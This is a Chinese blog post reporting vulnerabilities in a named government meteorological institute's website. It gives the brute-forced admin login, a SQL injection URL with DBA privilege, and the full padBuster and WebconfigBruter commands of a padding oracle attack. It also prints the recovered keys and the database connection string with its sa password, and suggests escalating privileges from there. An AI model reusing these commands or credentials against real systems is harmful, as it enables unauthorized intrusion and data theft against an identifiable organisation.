zoukankan      html  css  js  c++  java
  • 中国气象局某分院官网漏洞打包(弱口令+SQL注入+padding oracle)

    漏洞一、后台弱口令

    后台地址:http://www.hnmatc.org/admin/

    直接爆破得到账号admin  密码admin888

    漏洞二、SQL注入(前台后台都有)

    注入点:http://www.hnmatc.org/contents_news_down.aspx?id=669&type=132

    而且还是DBA权限

    共有5个库

    没动数据~~

    漏洞三、padding oracle(填充oracle漏洞)

    还是刚才那个登录界面:http://www.hnmatc.org/admin/

    由于该站是ASP.NET的  于是看看有没有padding oracle漏洞

    查看该URL的源代码

    随后我们构造漏洞地址:

    http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2
    然后利用我们的padding测试工具padBuster.pl
    工具需要perl环境

     然后输入我们的代码 
     padbuster.pl http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2 cWxcb2PXfUgWzoITVCYtLg2 16 -encoding 3 -plaintext "|||~/web.config"
     随后得到密匙 
     BEKLiGJw9rbsDY8IOiMmTAAAAAAAAAAAAAAAAAAAAAA1

    得到密匙后  我们需要另外一个读文件的工具WebconfigBruter.pl

    该工具也是需要perl环境

    输入代码

    WebconfigBruter.pl http://www.hnmatc.org/ScriptResource.axd BEKLiGJw9rbsDY8IOiMmTAAAAAAAAAAAAAAAAAAAAAA1 16

    得到最终密匙:uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0

    然后访问地址:http://www.hnmatc.org/ScriptResource.axd?d=uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0

    最后可以看到如图的web.config文件内容为

    可以看到​

    Server=.;DataBase=Hn_qxjdb;uid=sa;pwd=org,./123

    外连  随后连接提权就可以了~~~

  • 相关阅读:
    Dropdown 下拉菜单
    Breadcrumb 面包屑
    Tabs 标签页
    NavMenu 导航菜单
    Notification 通知
    MessageBox 弹框
    Message 消息提示
    Loading 加载
    Alert 警告
    Badge 标记
  • 原文地址:https://www.cnblogs.com/wh4am1/p/6683940.html
Copyright © 2011-2022 走看看